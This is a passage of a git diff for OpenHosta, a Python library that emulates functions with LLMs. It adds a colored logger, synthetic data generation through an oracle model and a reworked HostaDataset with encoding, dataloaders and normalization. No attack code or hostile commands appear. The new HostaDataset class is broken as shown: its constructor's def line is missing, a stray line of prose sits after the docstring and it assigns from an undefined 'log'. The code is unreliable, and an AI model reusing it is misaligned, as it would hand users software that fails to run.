- func (Func): The function object containing the type annotations for the LLM _outputs.
- data (dict): The LLM _outputs data to be checked and converted.
+ func (Func): The function object containing the type annotations for the LLM outputs.
+ data (dict): The LLM outputs data to be checked and converted.
checked (Any): The checked and converted data. If `data` contains a "return" key, its value is used as the checked data. Otherwise, `data` is used as the checked data.
is_passed (bool): A flag indicating whether the checked data should be converted or not. It is set to True if `data` contains a "return" key.
"""
@@ -50,7 +50,7 @@ def _default(x: Any) -> Any:
"""
return x
- def convert(self, typ: Type[T]) -> Dict[Type[T], Optional[Callable[[Any], T]]]:
+ def convert(self, typ: Type[T]) -> Callable[[Any], T]:
"""
A method to create a conversion function for a given type.
@@ -58,25 +58,23 @@ def convert(self, typ: Type[T]) -> Dict[Type[T], Optional[Callable[[Any], T]]]:
typ (Type[T]): The type for which a conversion function needs to be created.
Returns:
- Dict[Type[T], Optional[Callable[[Any], T]]]: A dictionary mapping types to their corresponding conversion functions.
+ Callable[[Any], T]: A conversion function for the given type.
"""
- convertMap = {
+ convert_map = {
NoneType: lambda x: None,
- str: lambda x: str(x),
- int: lambda x: int(x),
- float: lambda x: float(x),
- list: lambda x: list(x),
- set: lambda x: set(x),
- frozenset: lambda x: frozenset(x),
- tuple: lambda x: tuple(x),
- bool: lambda x: bool(x),
- dict: lambda x: dict(x),
- complex: lambda x: complex(x),
+ str: str,
+ int: int,
+ float: float,
+ list: list,
+ set: set,
+ frozenset: frozenset,
+ tuple: tuple,
+ bool: bool,
+ dict: dict,
+ complex: complex,
bytes: lambda x: bytes(x, encoding='utf-8') if isinstance(x, str) else bytes(x),
}
- if typ not in convertMap.keys():
- return self._default.__func__
- return convertMap[typ]
+ return convert_map.get(typ, self._default.__func__)
def convert_annotated(self) -> Any:
"""
diff --git a/src/OpenHosta/core/config.py b/src/OpenHosta/core/config.py
index df47b6f..fa1563a 100644
--- a/src/OpenHosta/core/config.py
+++ b/src/OpenHosta/core/config.py
@@ -30,10 +30,11 @@ class Model:
_SYS_PROMPT = ""
- def __init__(self, model: str = None, base_url: str = None, api_key: str = None):
+ def __init__(self, model: str = None, base_url: str = None, api_key: str = None, timeout: int = 30):
self.model = model
self.base_url = base_url
self.api_key = api_key
+ self.timeout = timeout
self._last_request = None
self._used_tokens = 0
self._nb_requests = 0
@@ -86,7 +87,7 @@ def api_call(
for key, value in llm_args.items():
l_body[key] = value
try:
- response = requests.post(self.base_url, headers=headers, json=l_body, timeout=30)
+ response = requests.post(self.base_url, headers=headers, json=l_body, timeout=self.timeout)
if response.status_code != 200:
response_text = response.text
diff --git a/src/OpenHosta/core/hosta.py b/src/OpenHosta/core/hosta.py
index 37933b7..8450634 100644
--- a/src/OpenHosta/core/hosta.py
+++ b/src/OpenHosta/core/hosta.py
@@ -59,10 +59,10 @@ def __new__(cls, *args, **kwargs) -> 'Hosta':
"[Hosta.__new__] The function {} must be called in a function/method."
.format(cls._extend(back_level=2)[0].__name__)
)
- if (hasattr(cls._obj[0], "Hosta")):
+ if hasattr(cls._obj[0], "Hosta"):
return cls._obj[0].Hosta
instance = super().__new__(cls)
- cls._attach(cls._obj[0], {"Hosta": instance})
+ cls.attach(cls._obj[0], {"Hosta": instance})
return instance
def __init__(self, *, caller_analysis: bool = True):
@@ -122,17 +122,16 @@ def _bdy_add(self, key: MemKey, value: MemValue) -> None:
value (MemValue): The value to be stored in the memory node.
"""
seen: List[MemKey] = []
- previous: MemKey = None
if self._infos.f_mem is None:
self._infos.f_mem = []
- id = 0
+ mem_id = 0
else:
- id = 0
+ mem_id = 0
for node in self._infos.f_mem:
if node.key == key:
- id += 1
- new = MemoryNode(key=key, id=id, value=value)
+ mem_id += 1
+ new = MemoryNode(key=key, id=mem_id, value=value)
self._infos.f_mem.append(new)
previous = new
for node in self._infos.f_mem:
diff --git a/src/OpenHosta/core/inspector.py b/src/OpenHosta/core/inspector.py
index ffc6819..bf84883 100644
--- a/src/OpenHosta/core/inspector.py
+++ b/src/OpenHosta/core/inspector.py
@@ -128,10 +128,10 @@ def _get_obj_from_func(
raise FrameError(
"[HostaInspector._extend] The foud object isn't a callable.")
- return (func, caller)
+ return func, caller
@staticmethod
- def _attach(obj: Callable, attr: Dict[str, Any]) -> Optional[bool]:
+ def attach(obj: Callable, attr: Dict[str, Any]) -> Optional[bool]:
"""
Attaches attributes to a function or method.
diff --git a/src/OpenHosta/core/logger.py b/src/OpenHosta/core/logger.py
new file mode 100644
index 0000000..c79b6c6
--- /dev/null
+++ b/src/OpenHosta/core/logger.py
@@ -0,0 +1,108 @@
+from typing import Union, Literal, Optional
+from enum import Enum
+import platform
+
+IS_UNIX = platform.system() != "Windows"
+
+class ANSIColor(Enum):
+ RESET = '\033[0m'
+ BLACK = '\033[30m'
+ RED = '\033[31m'
+ GREEN = '\033[32m'
+ YELLOW = '\033[33m'
+ BLUE = '\033[34m'
+ PURPLE = '\033[35m'
+ CYAN = '\033[36m'
+ WHITE = '\033[37m'
+
+ # Bold colors
+ BLACK_BOLD = '\033[1;30m'
+ RED_BOLD = '\033[1;31m'
+ GREEN_BOLD = '\033[1;32m'
+ YELLOW_BOLD = '\033[1;33m'
+ BLUE_BOLD = '\033[1;34m'
+ PURPLE_BOLD = '\033[1;35m'
+ CYAN_BOLD = '\033[1;36m'
+ WHITE_BOLD = '\033[1;37m'
+
+ # Bright (light) colors
+ BRIGHT_BLACK = '\033[90m'
+ BRIGHT_RED = '\033[91m'
+ BRIGHT_GREEN = '\033[92m' # Bright/Light Green
+ BRIGHT_YELLOW = '\033[93m'
+ BRIGHT_BLUE = '\033[94m'
+ BRIGHT_PURPLE = '\033[95m'
+ BRIGHT_CYAN = '\033[96m'
+ BRIGHT_WHITE = '\033[97m'
+
+ UNDERLINE = '\033[4m'
+ REVERSED = '\033[7m'
+
+class Logger:
+ def __init__(self, log_file_path: Optional[str] = None, verbose: Union[Literal[0, 1, 2], bool] = 2):
+ self.log_file_path: Optional[str] = log_file_path
+ if log_file_path:
+ self.log_file = open(log_file_path, "w")
+ self.log_file.close()
+        self.verbose = verbose if isinstance(verbose, int) and not isinstance(verbose, bool) else (2 if verbose else 0)
+        assert 0 <= self.verbose <= 2, "Please provide a valid verbose level (0, 1, or 2); default is 2"
+
+ def _log(
+ self,
+ prefix: str,
+ message: str,
+ level: int = 1,
+ color: ANSIColor = ANSIColor.BRIGHT_GREEN,
+ text_color: ANSIColor = ANSIColor.RESET,
+            one_line: bool = False
+ ):
+ """
+ Internal logging method.
+ :param prefix: The prefix for the log message
+ :param message: The message to log
+ :param level: The verbose level (0: Essential, 1: Normal, 2: Debug)
+ :param color: The color to use for the prefix
+ """
+ if level <= self.verbose:
+ if one_line and IS_UNIX:
+ print(f"{ANSIColor.RESET.value}[{color.value}{prefix}{ANSIColor.RESET.value}] {text_color.value}{message}", end="\r")
+ else:
+ print(f"{ANSIColor.RESET.value}[{color.value}{prefix}{ANSIColor.RESET.value}] {text_color.value}{message}")
+ if self.log_file_path:
+ with open(self.log_file_path, 'a', encoding='utf-8') as log_file:
+ log_file.write(f"[{prefix}] {message}" + "\n")
+
+ def log_error(self, message: str, level: int = 1):
+ self._log("Error", message, level, ANSIColor.BRIGHT_RED, ANSIColor.BRIGHT_RED)
+
+ def log_critical(self, message: str, level: int = 1):
+ self._log("Critical", message, level, ANSIColor.RED, ANSIColor.BRIGHT_RED)
+
+ def log_exception(self, exception: Exception, level: int = 1):
+ self._log("Exception", str(exception), level, ANSIColor.BRIGHT_RED, ANSIColor.BRIGHT_RED)
+
+ def log_warning(self, message: str, level: int = 1):
+ self._log("Warning", message, level, ANSIColor.BRIGHT_YELLOW, ANSIColor.BRIGHT_YELLOW)
+
+ def log_info(self, message: str, level: int = 1):
+ self._log("Info", message, level, ANSIColor.BRIGHT_BLUE)
+
+ def log_success(self, message: str, level: int = 1):
+ self._log("Success", message, level, ANSIColor.BRIGHT_GREEN)
+
+ def log_debug(self, message: str, level: int = 2):
+ self._log("Debug", message, level, ANSIColor.BRIGHT_PURPLE)
+
+ def log_verbose(self, message: str, level: int = 2):
+ self._log("Verbose", message, level, ANSIColor.BRIGHT_CYAN)
+
+ def log_custom(
+ self,
+ prefix: str,
+ message: str,
+ level: int = 1,
+ color: ANSIColor = ANSIColor.BRIGHT_GREEN,
+ text_color: ANSIColor = ANSIColor.RESET,
+            one_line: bool = False
+ ):
+ self._log(prefix, message, level, color, text_color, one_line)
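The core behavior of `Logger._log` is the verbosity gate: a message prints only when its level is at or below the configured verbosity. A minimal sketch of that gating, with the ANSI color machinery omitted and an injectable stream for testing (`MiniLogger` is illustrative, not part of the library):

```python
import io

class MiniLogger:
    """Sketch of the level gating in Logger._log (colors and file logging omitted)."""
    def __init__(self, verbose: int = 2, stream=None):
        assert 0 <= verbose <= 2
        self.verbose = verbose
        self.stream = stream or io.StringIO()

    def _log(self, prefix: str, message: str, level: int = 1) -> None:
        # 0: essential, 1: normal, 2: debug -- emit only if level <= verbose.
        if level <= self.verbose:
            self.stream.write(f"[{prefix}] {message}\n")

    def log_info(self, message: str) -> None:
        self._log("Info", message, level=1)

    def log_debug(self, message: str) -> None:
        self._log("Debug", message, level=2)

quiet = MiniLogger(verbose=0)
quiet.log_info("hidden")      # suppressed: level 1 > verbose 0
chatty = MiniLogger(verbose=2)
chatty.log_debug("shown")     # emitted: level 2 <= verbose 2
```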
diff --git a/src/OpenHosta/core/pydantic_usage.py b/src/OpenHosta/core/pydantic_usage.py
index 807e3cc..289a8d0 100644
--- a/src/OpenHosta/core/pydantic_usage.py
+++ b/src/OpenHosta/core/pydantic_usage.py
@@ -37,7 +37,7 @@ class Func(BaseModel):
f_doc: str = Field(default="", description="Documentation of the function, e.g., 'This function returns the sum of two integers.'")
f_call: str = Field(default="", description="Actual call of the function, e.g., 'func(1, 'hello')'")
f_args: Dict[str, Any] = Field(default_factory=dict, description="Arguments of the function, e.g., {'a': 1, 'b': 'hello'}")
- f_type: Tuple[List[Any], Any] = Field(default_factory=lambda: ([], None), description="Desired type of the _inputs and _outputs of the function")
+ f_type: Tuple[List[Any], Any] = Field(default_factory=lambda: ([], None), description="Desired type of the _inputs and outputs of the function")
f_schema: Dict[str, Any] = Field(default_factory=dict, description="Dictionary describing the function's return type (in case of pydantic).")
f_sig: Optional[inspect.Signature] = Field(default=None, description="Signature of the function")
f_locals: Optional[Dict[str, Any]] = Field(default=None, description="Local variables within the function's scope")
diff --git a/src/OpenHosta/exec/emulate.py b/src/OpenHosta/exec/emulate.py
index f732886..e20d245 100644
--- a/src/OpenHosta/exec/emulate.py
+++ b/src/OpenHosta/exec/emulate.py
@@ -47,7 +47,6 @@ def emulate(
**llm_args
) -> Any:
x = None
- l_ret: Any = None
if _infos is None:
x = Hosta()
@@ -59,19 +58,19 @@ def emulate(
model = DefaultManager.get_default_model()
if x:
- x._attach(_infos.f_obj, {
+ x.attach(_infos.f_obj, { # type: ignore
"_last_request": None,
"_last_response": None
})
try:
if x:
- x._attach(_infos.f_obj, {"_last_request": {
+ x.attach(_infos.f_obj, {"_last_request": { # type: ignore
'sys_prompt':f"{EMULATE_PROMPT!r}\n{func_prompt}\n",
'user_prompt':_infos.f_call
}
}
- )
+ )
response = model.simple_api_call(
sys_prompt=f"{EMULATE_PROMPT!r}\n{func_prompt}\n",
user_prompt=_infos.f_call,
@@ -79,7 +78,7 @@ def emulate(
)
if x:
- x._attach(_infos.f_obj, {"_last_response": response})
+ x.attach(_infos.f_obj, {"_last_response": response}) # type: ignore
l_ret = model.request_handler(response, _infos)
if post_callback is not None:
diff --git a/src/OpenHosta/exec/example.py b/src/OpenHosta/exec/example.py
index f21f751..d8d70b2 100644
--- a/src/OpenHosta/exec/example.py
+++ b/src/OpenHosta/exec/example.py
@@ -1,6 +1,6 @@
from __future__ import annotations
-from typing import Any, get_args
+from typing import Any, get_args, get_origin, Literal
from ..core.hosta import Hosta, ExampleType
@@ -15,6 +15,7 @@ def example(*args, hosta_out: Any = None, **kwargs):
expected_return_type = x._infos.f_type[1]
if not (
+ get_origin(expected_return_type) is Literal or
isinstance(hosta_out, expected_return_type) or
(expected_return_type == float and isinstance(hosta_out, int)) or
hosta_out in get_args(expected_return_type) or
diff --git a/src/OpenHosta/exec/generate_data.py b/src/OpenHosta/exec/generate_data.py
new file mode 100644
index 0000000..2a3b0f1
--- /dev/null
+++ b/src/OpenHosta/exec/generate_data.py
@@ -0,0 +1,56 @@
+import inspect
+from typing import Callable, Optional, Union, Literal
+
+from .predict.dataset.dataset import HostaDataset
+from .predict.dataset.oracle import LLMSyntheticDataGenerator
+from ..core.config import Model, DefaultModel
+from ..core.hosta import Func
+from ..core.logger import Logger
+
+
+def _analyze_function(func: Callable) -> Func:
+ if not callable(func):
+ raise TypeError("The provided object is not a function or callable.")
+
+ func_obj = Func()
+ func_obj.f_name = func.__name__
+ func_obj.f_doc = func.__doc__ if func.__doc__ else ""
+ func_obj.f_sig = inspect.signature(func)
+
+ arg_types = {}
+ input_types = []
+
+ for name, param in func_obj.f_sig.parameters.items():
+ param_type = param.annotation if param.annotation != inspect.Parameter.empty else None
+ arg_types[name] = {
+ "type": param_type,
+ "default": param.default if param.default != inspect.Parameter.empty else None
+ }
+ input_types.append(param_type)
+
+ func_obj.f_args = arg_types
+ return_type = func_obj.f_sig.return_annotation if func_obj.f_sig.return_annotation != inspect.Signature.empty else None
+ func_obj.f_type = (input_types, return_type)
+ func_obj.f_mem = None
+
+ return func_obj
+
+
+def generate_data(
+ func: Callable,
+        amount: int,
+        oracle: Optional[Model] = None,
+        verbose: Union[Literal[0, 1, 2], bool] = 2
+):
+    logger: Logger = Logger(verbose=verbose)
+    request_amounts = int(amount / 100) if amount > 100 else 1
+
+    logger.log_custom("Data Generation", f"Generating {amount} examples for function {func.__name__}")
+    data = LLMSyntheticDataGenerator.generate_synthetic_data(
+        func=_analyze_function(func),
+        logger=logger,
+        request_amounts=request_amounts,
+        examples_in_req=int(amount / request_amounts),
+ model=oracle if oracle is not None else DefaultModel().get_default_model()
+ )
+ return HostaDataset.from_list(data, logger)
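`generate_data` splits the requested total into batches of roughly 100 examples per oracle request. The arithmetic can be checked in isolation (note that integer truncation means batch sizes are approximate, e.g. 150 examples still go out as one request of 150):

```python
def batch_plan(amount: int):
    """Mirror of the request batching arithmetic in generate_data."""
    request_amounts = int(amount / 100) if amount > 100 else 1
    examples_in_req = int(amount / request_amounts)
    return request_amounts, examples_in_req
```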
diff --git a/src/OpenHosta/exec/predict/dataset/dataset.py b/src/OpenHosta/exec/predict/dataset/dataset.py
index 38b2519..eb2db01 100644
--- a/src/OpenHosta/exec/predict/dataset/dataset.py
+++ b/src/OpenHosta/exec/predict/dataset/dataset.py
@@ -1,14 +1,18 @@
-import csv
-import json
-import os
-from enum import Enum
-from typing import List, Optional, Any, Dict
+from typing import Any, Dict, List, Optional, Tuple, Union, get_origin, get_args
+from typing_extensions import Literal
+import os
+import csv, json
import torch
+from torch.utils.data import DataLoader, TensorDataset, random_split
+
+from enum import Enum
from .sample_type import Sample
from ..encoder.simple_encoder import SimpleEncoder
-
+from ..predict_memory import File
+from ....core.hosta import Func
+from ....core.logger import Logger
class SourceType(Enum):
"""
@@ -17,127 +21,402 @@ class SourceType(Enum):
CSV = "csv"
JSONL = "jsonl"
JSON = "json"
+
class HostaDataset:
- def __init__(self, verbose: int = 1):
+ """
+ class for managing datasets in Hosta
+ """
+    Class for managing datasets in Hosta.
self.path: Optional[str] = None # Path to the file
self.data: List[Sample] = [] # List of Sample objects
- self.dictionary: Dict[str, int] = {} # Dictionary for mapping str to id
+ self.dictionary: Dict[str, int] = {} # Dictionary for mapping str to id for encoding (for simple encoder -> Mini word2vec)
self.inference: Optional[Sample] = None # Inference data for understanding the data
- self.verbose: int = verbose # Verbose level for debugging
- self._encoder: Optional[SimpleEncoder] = None # Will store the encoder instance
+ self.log = log # Logger for logging the data
+ self.encoder: Optional[SimpleEncoder] = None # Encoder for encoding the data
- def add(self, sample: Sample):
+ ########################################################
+ ### Managing data ###
+    def add(self, data: Any, dataset: Optional[List[Sample]] = None) -> None:
"""
- Add a Sample object to the dataset.
+ Add data to the dataset
"""
- self.data.append(sample)
- def convert_data(self, batch_size: int, shuffle: bool, train_set_size: float = 0.8) -> tuple:
+ if dataset is None:
+ dataset = self.data
+
+ data_sampled = Sample(data)
+ dataset.append(data_sampled)
+ return None
+
+
+ ########################################################
+ ### Preparation of the data ###
+ def encode(self, max_tokens: int, dataset: Optional[List[Sample]] = None, inference_data: Optional[Sample] = None,
+               func: Func = None, dictionary_path: str = None, inference: bool = False) -> List[Sample]:
"""
- Save the dataset to a file in the specified format and convert it into dataloader for training.
+ Encode data with a token limit for str values.
"""
- if not isinstance(self.data[0].input, torch.Tensor):
- self.tensorify()
-
- inputs = torch.stack([sample.input for sample in self.data])
- if all(sample.output is not None for sample in self.data):
- outputs = torch.stack([sample.output for sample in self.data])
- dataset = torch.utils.data.TensorDataset(inputs, outputs)
+        assert func is not None, "Func attribute must be provided for encoding"
+ mapping_dict: Optional[Dict[str, int]] = None
+
+
+ output_type = func.f_type[1]
+ if get_origin(output_type) is Literal:
+ mapping_dict = self._generate_mapping_dict(output_type)
+ # print("Mapping dict : ", mapping_dict)
+
+ self.get_dictionary(dictionary_path)
+        self.encoder = SimpleEncoder.init_encoder(max_tokens, self.dictionary, dictionary_path, mapping_dict, inference)  # TODO: in the future we will be able to choose our own encoder
+
+ if inference:
+ inference_data = inference_data if inference_data is not None else self.inference
+ data_encoded = self.encoder.encode([inference_data])
+ self.inference = data_encoded[0]
else:
- dataset = torch.utils.data.TensorDataset(inputs)
-
- return self._create_dataloaders(dataset, batch_size, shuffle, train_set_size)
+ dataset = dataset if dataset is not None else self.data
+ data_encoded = self.encoder.encode(dataset)
+ self.data = data_encoded
- def save_data(self, file_path: str):
+ return data_encoded
+
+
+ def decode(self, predictions: Optional[Union[List[torch.Tensor], torch.Tensor]], func_f_type: Any) -> Tuple[Any, Any]:
"""
- Sauvegarde le dataset au format JSON
+ Decode the model predictions based on the function's return type.
"""
- data_to_save = {
- 'data': [
- {
- '_inputs': sample.input.tolist() if isinstance(sample.input, torch.Tensor) else sample.input,
- '_outputs': sample.output.tolist() if isinstance(sample.output, torch.Tensor) else sample.output
- }
- for sample in self.data
- ]
- }
- with open(file_path, 'w') as f:
- json.dump(data_to_save, f)
+ output_type = func_f_type[1]
+ output = self.encoder.decode(predictions, output_type)
+ return output, predictions
- def load_data(self, file_path: str):
- """
- Charge un dataset depuis un fichier JSON
+
+ def tensorize(self, value: Optional[Union[List[Sample], Sample]] = None, dtype: torch.dtype = None) -> List[Sample]:
"""
- with open(file_path, 'r') as f:
- data_dict = json.load(f)
+ Convert data to tensors for training.
- for sample_dict in data_dict['data']:
- self.add(Sample(sample_dict))
+ Args:
+ value: Optional data to tensorize (defaults to self.data)
+ dtype: Tensor dtype (defaults to torch.float32)
- def _create_dataloaders(self, dataset, batch_size: int, shuffle: bool, train_set_size: float):
- """
- Méthode utilitaire pour créer les dataloaders
+ Returns:
+ List of tensorized Samples
"""
- train_size = int(train_set_size * len(dataset))
-
- train_dataset = torch.utils.data.Subset(dataset, range(train_size))
- val_dataset = torch.utils.data.Subset(dataset, range(train_size, len(dataset)))
+ dtype = dtype if dtype is not None else torch.float32
+
+ if value is None:
+ value = self.data
+ elif isinstance(value, Sample):
+ value = [value]
+
+ for sample in value:
+ sample._inputs = torch.tensor(sample.input, dtype=dtype)
+
+ if sample.output is not None:
+ if isinstance(sample.output, (int, float)):
+ sample._outputs = torch.tensor(sample.output, dtype=dtype)
+ else:
+ sample._outputs = torch.tensor(sample.output, dtype=torch.long)
- return (
- torch.utils.data.DataLoader(train_dataset, batch_size=batch_size, shuffle=shuffle),
- torch.utils.data.DataLoader(val_dataset, batch_size=batch_size, shuffle=False)
- )
+ if value[0].output is None:
+ self.inference = value[0] # TODO: fix the error here
+ else:
+ self.data = value
+ return value
- @staticmethod
- def from_data(data_path: str, batch_size: int, shuffle: bool, train_set_size: float = 0.8, verbose: int = 1) -> tuple:
+ def to_dataloaders(self, batch_size: int, data: Optional[List[Sample]] = None,
+ train_ratio: float = 0.8, shuffle: bool = True) -> Tuple[DataLoader, DataLoader]:
"""
- Load a dataset from a file and convert it into dataloader for training.
+ Process the data into DataLoader objects.
"""
- dataset = HostaDataset(verbose)
- dataset.load_data(data_path)
- return dataset.convert_data(batch_size, shuffle, train_set_size)
+ assert 0 < train_ratio < 1, "Train ratio must be between 0 and 1"
+ assert batch_size > 0, "Batch size must be greater than 0"
+ data = data if data is not None else self.data
- def save(self, path: str, source_type: SourceType = SourceType.CSV, elements: Optional[List[Sample]] = None):
+ # Tensorize if needed
+ if not isinstance(data[0]._inputs, torch.Tensor):
+ data = self.tensorize(data)
+
+ # Stack tensors
+ inputs = torch.stack([sample._inputs for sample in data])
+
+ if all(sample._outputs is not None for sample in data):
+ outputs = torch.stack([sample._outputs for sample in data])
+ else:
+            raise ValueError("Output data is missing for at least one sample in the dataset")
+
+ dataset = TensorDataset(inputs, outputs)
+
+ train_size = int(train_ratio * len(dataset))
+ val_size = len(dataset) - train_size
+ # print("Train size : ", train_size)
+ # print("Val size : ", val_size)
+ train_set, val_set = random_split(dataset, [train_size, val_size])
+
+ train_loader = DataLoader(train_set, batch_size=batch_size, shuffle=shuffle)
+ val_loader = DataLoader(val_set, batch_size=batch_size, shuffle=shuffle)
+ # print("Train loader len : ", len(train_loader))
+ # print("Val loader len : ", len(val_loader))
+ return train_loader, val_loader
+
+ def normalize_data(self, normalization_file: File, data: Optional[Union[List[Sample], Sample]] = None) -> List[Sample]:
"""
- Save the dataset or specific elements to a file in the specified format.
- Converts Sample objects back to dictionaries for storage.
+ Normalize the input and output data column-wise to the range [-1, 1].
Args:
- path: Path where to save the file
- source_type: Type of file format to save (CSV, JSONL, or PICKLE)
- elements: Optional list of Sample objects to save. If None, saves entire dataset
- """
- self.path = path
- data_to_save = elements if elements is not None else self.data
-
- # Convert Samples to dictionaries for saving
- dict_data = []
- for sample in data_to_save:
- sample_dict = {}
- for i, input_value in enumerate(sample.input):
- sample_dict[f'input_{i}'] = input_value
+ normalization_file (File): Path to the file where the normalization stats will be saved.
+ data (Optional[Union[List[Sample], Sample]]): Data to normalize. If None, normalizes self.data.
+
+ Returns:
+ List[Sample]: Normalized samples.
+ """
+ if data is None:
+ data = self.data
+ elif isinstance(data, Sample):
+ data = [data]
+
+ if len(data) == 0:
+ raise ValueError("No data to normalize.")
+
+ num_columns = len(data[0].input)
+ min_values = [float('inf')] * num_columns
+ max_values = [float('-inf')] * num_columns
+
+ min_output = float('inf')
+ max_output = float('-inf')
+
+ for sample in data:
+ for col_idx, value in enumerate(sample.input):
+ if value < min_values[col_idx]:
+ min_values[col_idx] = value
+ if value > max_values[col_idx]:
+ max_values[col_idx] = value
if sample.output is not None:
- sample_dict['_outputs'] = sample.output
- dict_data.append(sample_dict)
+ if sample.output < min_output:
+ min_output = sample.output
+ if sample.output > max_output:
+ max_output = sample.output
+
+ normalization_data = {
+ 'inputs': {'min': min_values, 'max': max_values},
+ 'output': {'min': min_output, 'max': max_output}
+ }
- if source_type == SourceType.CSV:
- with open(path, 'w', newline='', encoding='utf-8') as f:
- if not dict_data:
- return
- writer = csv.DictWriter(f, fieldnames=dict_data[0].keys())
- writer.writeheader()
- writer.writerows(dict_data)
+ for sample in data:
+ for col_idx, value in enumerate(sample.input):
+ if max_values[col_idx] == min_values[col_idx]:
+ sample.input[col_idx] = 0
+ else:
+ sample.input[col_idx] = 2 * (value - min_values[col_idx]) / (max_values[col_idx] - min_values[col_idx]) - 1
+ if sample.output is not None:
+ if max_output == min_output:
+ sample.output = 0
+ else:
+ sample.output = 2 * (sample.output - min_output) / (max_output - min_output) - 1
- elif source_type == SourceType.JSONL:
- with open(path, 'w', encoding='utf-8') as f:
- for row in dict_data:
- json.dump(row, f)
- f.write('\n')
+ with open(normalization_file.path, 'w', encoding='utf-8') as f:
+ json.dump(normalization_data, f, indent=2, sort_keys=True) # type: ignore
+
+ self.data = data
+ return self.data
+
+ def normalize_input_inference(self, normalization_file: File):
+ """
+ Normalize the input data column-wise to the range [-1, 1].
+
+ Args:
+ normalization_file (File): Path to the file where the normalization stats are stored.
+
+ Returns:
+ Sample: Normalized input sample.
+ """
+ if self.inference is None:
+ raise ValueError("No data to normalize.")
+
+ with open(normalization_file.path, 'r', encoding='utf-8') as f:
+ normalization_data = json.load(f)
+
+ input_min = normalization_data['inputs']['min']
+ input_max = normalization_data['inputs']['max']
+
+ for col_idx, value in enumerate(self.inference.input):
+ if input_max[col_idx] != input_min[col_idx]:
+ self.inference.input[col_idx] = 2 * (value - input_min[col_idx]) / (input_max[col_idx] - input_min[col_idx]) - 1
+ else:
+ self.inference.input[col_idx] = 0
+
+ return self.inference
+
+
+ def denormalize_output_inference(self, output: float, normalization_file: File):
+ """
+ Denormalize the output data using the normalization stats stored in the given file.
+ The file must contain the min and max for the output.
+
+ Args:
+ output (float): Output data to denormalize.
+ normalization_file (File): Path to the normalization metadata file.
+
+ Returns:
+ float: Denormalized output.
+ """
+ with open(normalization_file.path, 'r', encoding='utf-8') as f:
+ normalization_data = json.load(f)
+ output_min = normalization_data['output']['min']
+ output_max = normalization_data['output']['max']
+
+ if output_max != output_min:
+ output = ((output + 1) / 2) * (output_max - output_min) + output_min
else:
- raise ValueError(f"Unsupported source type: {source_type}")
+ output = output_min
+
+ return output
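The column-wise min-max mapping to [-1, 1] and its inverse can be sketched standalone; the formulas below are the same ones used per column in `normalize_data` and in `denormalize_output_inference`, including the degenerate case where min equals max:

```python
def normalize(value: float, vmin: float, vmax: float) -> float:
    # Map [vmin, vmax] linearly onto [-1, 1]; a constant column collapses to 0.
    if vmax == vmin:
        return 0.0
    return 2 * (value - vmin) / (vmax - vmin) - 1

def denormalize(value: float, vmin: float, vmax: float) -> float:
    # Inverse mapping: [-1, 1] back to [vmin, vmax].
    if vmax == vmin:
        return vmin
    return ((value + 1) / 2) * (vmax - vmin) + vmin
```

Round-tripping a value through `normalize` then `denormalize` recovers it (up to floating-point error), which is what lets the stats file written at training time be reused at inference.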
+
+ @staticmethod
+ def denormalize_output(output: Sample, normalization_file: File):
+ """
+ Denormalize the output data using the normalization stats stored in the given file.
+ The file must contain the min and max for the output.
+
+ Args:
+ output (Sample): Output data to denormalize.
+ normalization_file (File): Path to the normalization metadata file.
+
+ Returns:
+ Sample: Denormalized output sample.
+ """
+ with open(normalization_file.path, 'r', encoding='utf-8') as f:
+ normalization_data = json.load(f)
+ output_min = normalization_data['output']['min']
+ output_max = normalization_data['output']['max']
+
+ if output_max != output_min:
+ output.output = ((output.output + 1) / 2) * (output_max - output_min) + output_min
+ else:
+ output.output = output_min
+
+ return output
+
+ def manage_example(self):
+ pass
+
+ def examples_to_eval(self):
+ pass
+
+
+ ########################################################
+ ### Internal function process ###
+ @staticmethod
+ def _generate_mapping_dict(literal) -> dict[str, int]:
+ """
+ Generate a mapping dictionary for the output type.
+ Parameters:
+            literal: A Literal type containing the possible values
+ Returns:
+ dict: A dictionary mapping each value to a unique integer (starting from 0)
+ """
+ if get_origin(literal) is not Literal:
+ raise ValueError("The literal arg must be a Literal type")
+
+ unique_values = list(get_args(literal))
+ mapping_dict = {value: idx for idx, value in enumerate(unique_values)}
+ return mapping_dict
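`_generate_mapping_dict` enumerates a `Literal`'s allowed values into integer class indices, in declaration order. The same logic can be reproduced with only the `typing` helpers (`Mood` is an illustrative example type):

```python
from typing import Literal, get_args, get_origin

def generate_mapping_dict(literal) -> dict:
    """Map each Literal value to a unique integer index, in declaration order."""
    if get_origin(literal) is not Literal:
        raise ValueError("The literal arg must be a Literal type")
    return {value: idx for idx, value in enumerate(get_args(literal))}

Mood = Literal["happy", "sad", "neutral"]
```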
+
+    def get_dictionary(self, dictionary_path: str) -> None:
+ """
+ Load the tokenizer dictionary from a file
+ """
+ if not os.path.exists(dictionary_path):
+ self.dictionary = {}
+ else:
+ with open(dictionary_path, 'r', encoding='utf-8') as f:
+ loaded_dict = json.load(f)
+ self.dictionary = loaded_dict if loaded_dict else {}
+
+ def save_dictionary(self, dictionary_path: str) -> None:
+ """
+ Save the tokenizer dictionary of mapping to a file
+ """
+ # Create directory if it doesn't exist
+ os.makedirs(os.path.dirname(dictionary_path), exist_ok=True)
+
+ with open(dictionary_path, 'w', encoding='utf-8') as f:
+ json.dump(self.dictionary, f, indent=2, sort_keys=True) # type: ignore
+
+    def prepare_inference(self, inference_data: dict, max_tokens: int, func: Func, dictionary_path: str) -> None:
+ """
+ Prepare the inference data for the model.
+ """
+ self.inference = Sample(inference_data)
+ self.encode(max_tokens=max_tokens, inference_data=self.inference, func=func, dictionary_path=dictionary_path, inference=True)
+ self.tensorize(self.inference)
+
+ def save(self, path: str, source_type: SourceType = SourceType.CSV, elements: Optional[List[Sample]] = None):
+ """
+ Save the dataset or specific elements to a file in the specified format.
+ Converts Sample objects back to dictionaries for storage.
+
+ Args:
+ path: Path where to save the file
+ source_type: Type of file format to save (CSV, JSONL, or PICKLE)
+ elements: Optional list of Sample objects to save. If None, saves entire dataset
+ """
+ self.path = path
+ data_to_save = elements if elements is not None else self.data
+
+ # Convert Samples to dictionaries for saving
+ dict_data = []
+ for sample in data_to_save:
+ sample_dict = {}
+ for i, input_value in enumerate(sample.input):
+ sample_dict[f'input_{i}'] = input_value
+ if sample.output is not None:
+ sample_dict['outputs'] = sample.output
+ dict_data.append(sample_dict)
+
+ if source_type == SourceType.CSV:
+ with open(path, 'w', newline='', encoding='utf-8') as f:
+ if not dict_data:
+ return
+ writer = csv.DictWriter(f, fieldnames=dict_data[0].keys()) # type: ignore
+ writer.writeheader()
+ writer.writerows(dict_data)
+
